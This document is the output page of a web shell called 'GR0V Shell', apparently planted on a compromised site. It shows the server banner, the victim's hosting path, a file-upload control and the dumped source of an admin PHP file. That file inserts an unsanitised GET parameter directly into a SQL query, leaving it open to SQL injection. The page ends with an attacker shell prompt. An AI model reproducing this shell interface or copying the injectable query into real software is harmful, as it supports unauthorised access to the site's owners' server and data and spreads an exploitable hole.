? GR0V Shell

GR0V shell

Linux in-mum-web921.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64

Path : /home/u949514618/domains/karmaasrconsultants.com/public_html/admin/
File Upload :
Current File : /home/u949514618/domains/karmaasrconsultants.com/public_html/admin/ajax1.php

<?php
include("db.php");

    $userid=$_GET["underid"];

    if($userid!=""){
        $res=mysqli_query($con,"select * from department where program_id=$userid");
        echo "<lable for='department' class='col-sm-2 control-label'>Select Department</lable><div class='col-sm-10'><select id='departmentdd' name='department' class='form-control'><option value='0'>Select Department</option>";
        while($row=mysqli_fetch_array($res)){
            $id=$row["id"];
        echo "<option value='$id'>"; echo $row["title"]; echo "</option>";
        }
        echo "</select></div>";
        }

    
?>

T1KUS90T
  root-grov@89.117.188.241:~$